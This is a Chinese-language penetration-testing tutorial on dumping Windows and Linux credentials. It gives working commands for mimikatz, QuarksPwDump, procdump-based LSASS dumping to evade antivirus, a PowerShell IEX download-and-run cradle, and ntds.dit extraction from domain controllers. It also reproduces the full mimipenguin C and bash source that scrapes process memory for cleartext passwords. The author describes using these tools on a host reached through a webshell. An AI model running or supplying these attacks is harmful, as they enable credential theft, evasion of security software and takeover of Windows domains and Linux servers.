Windows系統:
0x01 windows密碼Hash
早期SMB協議在網絡上傳輸明文口令。后來出現"LAN Manager Challenge/Response"驗證機制,簡稱LM,它是如此簡單以至很容易被破解。微軟提出了WindowsNT挑戰/響應驗證機制,稱之為NTLM。現在已經有了更新的NTLMv2以及Kerberos驗證體系。Windows加密過的密碼口令,我們稱之為hash(中文:哈希),Windows的系統密碼hash默認情況下一般由兩部分組成:第一部分是LM-hash,第二部分是NTLM-hash。
NTLM-Hash與LM-Hash算法相比,明文口令大小寫敏感,但無法根據NTLM-Hash判斷原始明文口令是否小於8字節,擺脫了魔術字符串"KGS!@#$%"。MD4是真正的單向哈希函數,窮舉做為數據源出現的明文,難度較大。問題在於,微軟一味強調NTLM-Hash的強度高,卻避而不談一個事實,為了保持向后兼容性,NTLM-Hash缺省總是與LM-Hash一起使用的。這意味着NTLM-Hash強調再高也是無助於安全的,相反潛在損害着安全性。增加NTLM-Hash后,首先利用LM-Hash的弱點窮舉出原始明文口令的大小寫不敏感版本,再利用NTLM-Hash修正出原始明文口令的大小寫敏感版本。
Windows系統下的hash密碼格式為:用戶名稱:RID:LM-HASH值:NT-HASH值,例如:Administrator:500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::表示
用戶名稱為:Administrator
RID為:500
LM-HASH值為:C8825DB10F2590EAAAD3B435B51404EE
NT-HASH值為:683020925C5D8569C23AA724774CE6CC
如果你知道這個用戶的hash密碼了,拿着C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC去hash在線查詢網站。
0x02 QuarksPwDump
一般用QuarksPwDump_v0.2b來抓取整個windows系列的密碼hash,將得到的hash值在http://www.objectif-securite.ch/ophcrack.php查詢。
QuarksPwDump抓取密碼的命令如下:(其他命令可以參考軟件說明)
quarkspwdump.exe -dhl
得到的整個HASH值拿去在線破解。
0x03 mimikatz
1、常用命令介紹
system::user //查看當前登錄的用戶 process::list //列出進程 process::stop processname //結束進程(有些進程結束不了,即使權限夠大) process::suspend processname //暫停進程 process::modules //列出系統核心模塊和其所在的物理路徑 service::list //列出系統服務 service::stop(start) service_name //停止(開啟)服務 privilege::list //列出系統權限列表 privilege::debug /提升權限 (執行這條命令得有足夠的權限) nogpo::cmd //打開cmd nogpo::regedit //打開注冊表 ts::sessions //顯示當前回話 ts::processes //顯示當前進程及其PID sekurlsa::logonpasswords //獲取當前在線用戶的明文密碼(需要高權限運行) lsadump::lsa /patch //獲取當前此計算機存在過用戶的NTLMHASH inject::process lsass.exe '路徑' sekurlsa.dll //進程注入(如果用1.0版本獲取hash的時候發現sekurlsa模塊存在,就可以用進程注入一個dll文件,然后在獲取hash)
2、利用過程
密碼抓取神器mimikatz來測試一下,命令如下:
privilege::debug
sekurlsa::logonpasswords
圖示結果如下:
有沒有發現,mimikatz和QuarksPwDump抓取的LM-HASH是不同的,而且mimikatz直接就把系統密碼給取到了。NT-HASH兩款軟件得到的結果是一樣的。
在滲透測試過程中會出現這樣得場景,我已經chopper連上對方主機,但是系統默認安裝了360安全衛士或其他得安全軟件。我上傳的mimikatz和QuarksPwDump都被查殺了。也就是說我想利用這兩款軟件常規思路獲取系統的密碼HASH已經是不太可能了。其實,我們可以先dump對方主機的LSASS內存文件,然后在自己主機用mimikatz進行處理,這樣就可以得到對方主機的系統HASH和密碼。
可以到微軟的官方網站下載 ProDump,這個肯定不會引起殺毒軟件的報毒和查殺了。
命令如下:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
圖示如下:
接下來,再演示一下本地用mimikatz進行破解:
首先輸入命令:
mimikatz.exe "sekurlsa::minidump lsass.dmp"
接着輸入命令:
sekurlsa::logonpasswords
可以看到,能夠得到離線得到系統密碼,這樣就可以在對方主機上繞過殺毒軟件的查殺了。
有時候不能還原出明文密碼,但是可以得到NTHash,推薦一個破解網站用於嘗試破解這個Hash。
https://www.objectif-securite.ch/ophcrack.php
在烏雲知識庫中也有看到利用PowerShell完成Prodump一樣工作的命令。具體命令如下:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"
我在被滲透主機上進行嘗試過,發現也是可行的,不過chopper的虛擬終端下會顯示錯誤,實際上已經成功執行Powershell代碼。不過總體感覺還是Prodump用起來更加方便。
Metasploit中也有集成mimkatz的。具體教程可以參考 http://www.offensive-security.com/metasploit-unleashed/Mimikatz
0x04 NTDSDump相關
受不了NTDSXTract的龜速,於是用quarkspwdump改了個能讀取system.hiv的離線版提取工具。
ntds.dit其實就是個esent數據庫,微軟本身就有一系列的文檔化api能夠操作這個數據庫。
其命令行如下:
ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]
-f ntds.dit路徑
-k 可選的十六進制格式的SYSKEY
-s 可選的system.hiv路徑
-h 導出歷史密碼記錄
-t 導出格式,LC或JOHN
-o 導出到指定文件中
SYSKEY實際上就是HKLM\SYSTEM\CurrentControlSet\Control\Lsa下面幾個子項的類型信息,可以用RegQueryInfoKey查詢出來。
附件里面提供了兩個導出工具,getsyskey_c.exe由vc6編譯,其源碼為getsyskey.cpp,用vc6直接打開編譯即可。
getsyskey_cs.exe由.net2.0編譯,源碼為getsyskey.cs,用csc直接編譯即可。
已知錯誤:
JetAttachDatabase() failed
原因:數據庫需要修復,執行esentutl /p /o ntds.dit進行修復。
下載地址:
另:改完之后又看了看quarkspwdump的github,發現有人提交了個pull request:https://github.com/quarkslab/quarkspwdump/pull/3
其添加了一個加載system.hiv的功能,調用了RegLoadKey。而這個API必須要過UAC才行,所以用起來還是挺別扭的,不如這個直接讀取文件進行處理來得痛快。
安全脈搏姿勢
在2008+域控上使用 ntdsutil snapshot mount導出ntds.dit, SAM以及System ,
ntdsutil snapshot activate instance ntds create mount {GUID} copy c:\MOUNT_POINT\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit unmount {GUID} quit quit 然后就是各種copy了
在域控上使用 QuarksPwDump.exe 導出絕大部分明文:
QuarksPwDump.exe --dump-hash-domain --output SecPulseHash.txt --ntds-file c:\ntds.dit
下載回本地再用QuarksPwDump似乎就不行,主要因為本地無法指定SYSTEM文件導致獲取不到key
附Quarks PWDump使用參數:
quarks-pwdump.exe <options>
Options :
-dhl --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd --dump-hash-domain (NTDS_FILE must be specified)
-db --dump-bitlocker (NTDS_FILE must be specified)
-nt --ntds-file FILE
-hist --with-history (optional)
-t --output-type JOHN/LC (optional, if no=>JOHN)
-o --output FILE (optional, if no=>stdout)
Example: quarks-pwdump.exe --dump-hash-domain --with-history
當然也可以把ntds.dit, SAM以及System下載回來(很多大內網 ntds就好幾G,下載回來不太科學)用某工具解密 不過感覺有點龐大,現在我們可以使用NTDSDump.exe
NTDSDump.exe -f ntds.dit -s SYSTEM -o SecPulseHash.txt
0x05 ShadowCopy+QuarksPwDump0.3a
1. 使用ShadowCopy的命令行版,編寫bat實現拷貝ntds.dit至當前目錄.
ShadowCopy.vbs
setlocal if NOT "%CALLBACK_SCRIPT%"=="" goto :IS_CALLBACK set SOURCE_DRIVE_LETTER=%SystemDrive% set SOURCE_RELATIVE_PATH=\windows\ntds\ntds.dit set DESTINATION_PATH=%~dp0 @echo ...Determine the scripts to be executed/generated... set CALLBACK_SCRIPT=%~dpnx0 set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd @echo ...Creating the shadow copy... "%~dp0vshadow.exe" -script=%TEMP_GENERATED_SCRIPT% -exec="%CALLBACK_SCRIPT%" %SOURCE_DRIVE_LETTER% del /f %TEMP_GENERATED_SCRIPT% @goto :EOF :IS_CALLBACK setlocal @echo ...Obtaining the shadow copy device name... call %TEMP_GENERATED_SCRIPT% @echo ...Copying from the shadow copy to the destination path... copy "%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%" %DESTINATION_PATH%
參考鏈接: http://blogs.msdn.com/b/adioltean/archive/2005/01/05/346793.aspx
2.修復復制出來的數據庫
esentutl /p /o ntds.dit
3.使用QuarksPwDump直接讀取信息並將結果導出至文件
QuarksPwDump.exe -dhb -hist -nt ntds.dit -o log.txt
Tips:
QuarksPwDump.exe:Dump various types of Windows credentials without injecting in any process.
源碼下載鏈接,vs2010直接編譯即可
https://github.com/quarkslab/quarkspwdump
坑A:
COM call “m_pVssObject->InitializeForBackup()” failed.
域控是64位的,你運行的是32位的vshadow.exe。
解決方法:安裝win7 SDK,使用64位的vshadow.exe(可使用在win2008、win2012)(默認位置)“C:\Program Files\Microsoft SDKs\Windows\v6.1\Bin\x64\vsstools\vshadow.exe”。
坑B:
源碼下載鏈接,vs2010直接編譯即可
https://github.com/quarkslab/quarkspwdump
主頁上顯示的是master,其實還是0.2版本的。
真實的release地址是(不用編譯)QuarksPwDump-0.3a
作者編譯的版本在執行的時候會顯示0.2b,此處應該是作者沒處理好,不過不影響咱們使用,只要觀察是否有-sf參數,即可判斷是否是新版。
linux系統
Linux下密碼抓取神器mimipenguin
項目地址
https://github.com/huntergregal/mimipenguin
需求:
ROOT權限
程序源碼:
#include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <dirent.h> #include <string.h> #include <stdlib.h> #include "targets.h" #include "gnomeKeyring.h" #include "util.h" int processTarget(char *target) { DIR *dir = NULL; struct dirent* de = 0; int pid = -1, ret = -1; int result = 0; FILE *fp = NULL; char cmdlineFile[MAX_PATH] = {0}; char *taskName = NULL; size_t taskSize = 0; dir = opendir(PROC); if ( dir == NULL ) { printf("[!] ERROR: Failed to open /proc\n"); return -1; } while ((de = readdir(dir)) != 0 ) { if ( !strcmp(de->d_name, ".") || !strcmp(de->d_name, "..")) continue; result = 0; result = sscanf(de->d_name, "%d", &pid); if ( result != 1) continue; memset(cmdlineFile, 0, MAX_PATH); snprintf(cmdlineFile, MAX_PATH-1, "%s/%d/cmdline", PROC, pid); if ( (fp = fopen(cmdlineFile, "r")) == NULL ) continue; // likley lost the race for a process that just closed taskSize = 0; if ( getline(&taskName, &taskSize, fp) > 0 ) { if ( strstr(taskName, GNOME_KEYRING_DAEMON) ) // gnome-keyring-daemon process { if ( gnomeKeyringDump(pid) < 0 ) { printf(" [!] ERROR: dumping passwords from keyring\n"); //goto CLEANUP; } } } if (taskName != NULL) { free(taskName); taskName = NULL; } if ( fp != NULL ) { fclose(fp); fp = NULL; } } ret = 0; CLEANUP: if (taskName != NULL) { free(taskName); taskName = NULL; } if ( fp != NULL ) { fclose(fp); fp = NULL; } closedir(dir); return ret; } int main() { size_t numTargets = sizeof(g_targets)/sizeof(char*); if ( getuid() != 0 ) { printf("[!] Must be root!\n"); return -1; } for (int i=0; i <numTargets; i++) { processTarget(g_targets[i]); } return 0; }
#!/bin/bash # Author: Hunter Gregal # Github: /huntergregal Twitter: /huntergregal Site: huntergregal.com # Dumps cleartext credentials from memory #root check if [[ "$EUID" -ne 0 ]]; then echo "Root required - You are dumping memory..." echo "Even mimikatz requires administrator" exit 1 fi #Store results to cleanup later export RESULTS="" dump_pid () { system=$3 pid=$1 output_file=$2 if [[ $system == "kali" ]]; then mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/$pid/maps | egrep 'heap|stack' | cut -d' ' -f 1) else mem_maps=$(grep -E "^[0-9a-f-]* r" /proc/$pid/maps | cut -d' ' -f 1) fi while read -r memrange; do echo $memrange memrange_start=`echo $memrange | cut -d"-" -f 1`; memrange_start=`printf "%u\n" 0x$memrange_start`; memrange_stop=`echo $memrange | cut -d"-" -f 2`; memrange_stop=`printf "%u\n" 0x$memrange_stop`; memrange_size=$(($memrange_stop - $memrange_start)); dd if=/proc/$pid/mem of=${output_file}.${pid} ibs=1 oflag=append conv=notrunc \ skip=$memrange_start count=$memrange_size > /dev/null 2>&1 done <<< "$mem_maps" } parse_pass () { #$1 = DUMP, $2 = HASH, $3 = SALT, $4 = SOURCE #If hash not in dump get shadow hashes if [[ ! "$2" ]]; then SHADOWHASHES="$(cut -d':' -f 2 /etc/shadow | egrep '^\$.\$')" fi #Determine password potential for each word while read -r line; do #If hash in dump, prepare crypt line if [[ "$2" ]]; then #get ctype CTYPE="$(echo "$2" | cut -c-3)" #Escape quotes, backslashes, single quotes to pass into crypt SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;') CRYPT="\"$SAFE\", \"$CTYPE$3\"" if [[ $(python -c "import crypt; print crypt.crypt($CRYPT)") == "$2" ]]; then #Find which user's password it is (useful if used more than once!) USER="$(grep "${2}" /etc/shadow | cut -d':' -f 1)" export RESULTS="$RESULTS$4 $USER:$line \n" fi #Else use shadow hashes elif [[ $SHADOWHASHES ]]; then while read -r thishash; do CTYPE="$(echo "$thishash" | cut -c-3)" SHADOWSALT="$(echo "$thishash" | cut -d'$' -f 3)" #Escape quotes, backslashes, single quotes to pass into crypt SAFE=$(echo "$line" | sed 's/\\/\\\\/g; s/\"/\\"/g; s/'"'"'/\\'"'"'/g;') CRYPT="\"$SAFE\", \"$CTYPE$SHADOWSALT\"" if [[ $(python -c "import crypt; print crypt.crypt($CRYPT)") == "$thishash" ]]; then #Find which user's password it is (useful if used more than once!) USER="$(grep "${thishash}" /etc/shadow | cut -d':' -f 1)" export RESULTS="$RESULTS$4 $USER:$line\n" fi done <<< "$SHADOWHASHES" #if no hash data - revert to checking probability else if [[ $line =~ ^_pammodutil.+[0-9]$ ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ ^LOGNAME= ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ UTF-8 ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ ^splayManager[0-9]$ ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ ^gkr_system_authtok$ ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ [0-9]{1,4}:[0-9]{1,4}: ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ Manager\.Worker ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ /usr/share ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ /bin ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ \.so\.[0-1]$ ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ x86_64 ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ (aoao) ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" elif [[ $line =~ stuv ]]; then export RESULTS="$RESULTS[LOW]$4 $line\n" else export RESULTS="$RESULTS[HIGH]$4 $line\n" fi fi done <<< "$1" } #Support Kali if [[ $(uname -a | awk '{print tolower($0)}') == *"kali"* ]]; then SOURCE="[SYSTEM - GNOME]" #get gdm-session-worker [pam/gdm-password] process PID="$(ps -eo pid,command | sed -rn '/gdm-password\]/p' | awk 'BEGIN {FS = " " } ; { print $1 }')" #if exists aka someone logged into gnome then extract... if [[ $PID ]];then while read -r pid; do dump_pid "$pid" /tmp/dump "kali" HASH="$(strings "/tmp/dump.${pid}" | egrep -m 1 '^\$.\$.+$')" SALT="$(echo "$HASH" | cut -d'$' -f 3)" DUMP="$(strings "/tmp/dump.${pid}" | egrep '^_pammodutil_getpwnam_root_1$' -B 5 -A 5)" DUMP="${DUMP}$(strings "/tmp/dump.${pid}" | egrep '^gkr_system_authtok$' -B 5 -A 5)" #Remove dupes to speed up processing DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u) parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE" #cleanup rm -rf "/tmp/dump.${pid}" done <<< "$PID" fi fi #Support Ubuntu if [[ $(uname -a | awk '{print tolower($0)}') == *"ubuntu"* ]]; then SOURCE="[SYSTEM - GNOME]" #get /usr/bin/gnome-keyring-daemon process PID="$(ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk 'BEGIN {FS = " " } ; { print $1 }')" #if exists aka someone logged into gnome then extract... if [[ $PID ]];then while read -r pid; do dump_pid "$pid" /tmp/dump HASH="$(strings "/tmp/dump.${pid}" | egrep -m 1 '^\$.\$.+$')" SALT="$(echo "$HASH" | cut -d'$' -f 3)" DUMP=$(strings "/tmp/dump.${pid}" | egrep '^.+libgck\-1\.so\.0$' -B 10 -A 10) DUMP+=$(strings "/tmp/dump.${pid}" | egrep -A 5 -B 5 'libgcrypt\.so\..+$') #Remove dupes to speed up processing DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u) parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE" #cleanup rm -rf "/tmp/dump.${pid}" done <<< "$PID" fi fi #Support VSFTPd - Active Users if [[ -e "/etc/vsftpd.conf" ]]; then SOURCE="[SYSTEM - VSFTPD]" #get nobody /usr/sbin/vsftpd /etc/vsftpd.conf PID="$(ps -eo pid,user,command | grep vsftpd | grep nobody | awk 'BEGIN {FS = " " } ; { print $1 }')" #if exists aka someone logged into FTP then extract... if [[ $PID ]];then while read -r pid; do dump_pid "$pid" /tmp/vsftpd HASH="$(strings "/tmp/vsftpd.${pid}" | egrep -m 1 '^\$.\$.+$')" SALT="$(echo "$HASH" | cut -d'$' -f 3)" DUMP=$(strings "/tmp/vsftpd.${pid}" | egrep -B 5 -A 5 '^::.+\:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$') #Remove dupes to speed up processing DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u) parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE" done <<< "$PID" #cleanup rm -rf /tmp/vsftpd* fi fi #Support Apache2 - HTTP BASIC AUTH if [[ -e "/etc/apache2/apache2.conf" ]]; then SOURCE="[HTTP BASIC - APACHE2]" #get all apache workers /usr/sbin/apache2 -k start PID="$(ps -eo pid,user,command | grep apache2 | grep -v 'grep' | awk 'BEGIN {FS = " " } ; { print $1 }')" #if exists aka apache2 running if [[ "$PID" ]];then #Dump all workers while read -r pid; do gcore -o /tmp/apache $pid > /dev/null 2>&1 #without gcore - VERY SLOW! #dump_pid $pid /tmp/apache done <<< "$PID" #Get encoded creds DUMP="$(strings /tmp/apache* | egrep '^Authorization: Basic.+=$' | cut -d' ' -f 3)" #for each extracted b64 - decode the cleartext while read -r encoded; do CREDS="$(echo "$encoded" | base64 -d)" if [[ "$CREDS" ]]; then export RESULTS="$RESULTS$SOURCE $CREDS\n" fi done <<< "$DUMP" #cleanup rm -rf /tmp/apache* fi fi #Support sshd - Search active connections for Sudo passwords if [[ -e "/etc/ssh/sshd_config" ]]; then SOURCE="[SYSTEM - SSH]" #get all ssh tty/pts sessions - sshd: user@pts01 PID="$(ps -eo pid,command | egrep 'sshd:.+@' | grep -v 'grep' | awk 'BEGIN {FS = " " } ; { print $1 }')" #if exists aka someone logged into SSH then dump if [[ "$PID" ]];then while read -r pid; do dump_pid "$pid" /tmp/sshd HASH="$(strings "/tmp/sshd.${pid}" | egrep -m 1 '^\$.\$.+$')" SALT="$(echo "$HASH" | cut -d'$' -f 3)" DUMP=$(strings "/tmp/sshd.${pid}" | egrep -A 3 '^sudo.+') #Remove dupes to speed up processing DUMP=$(echo "$DUMP" | tr " " "\n" |sort -u) parse_pass "$DUMP" "$HASH" "$SALT" "$SOURCE" done <<< "$PID" #cleanup rm -rf /tmp/sshd.* fi fi #Output results to STDOUT printf "MimiPenguin Results:\n" printf "%b" "$RESULTS" | sort -u unset RESULTS
使用實例:
0x06 參考鏈接
https://www.secpulse.com/archives/6301.html
https://www.cnblogs.com/hiccup/p/4380298.html
https://blog.csdn.net/cao2110/article/details/51830975
http://www.freebuf.com/sectool/131165.html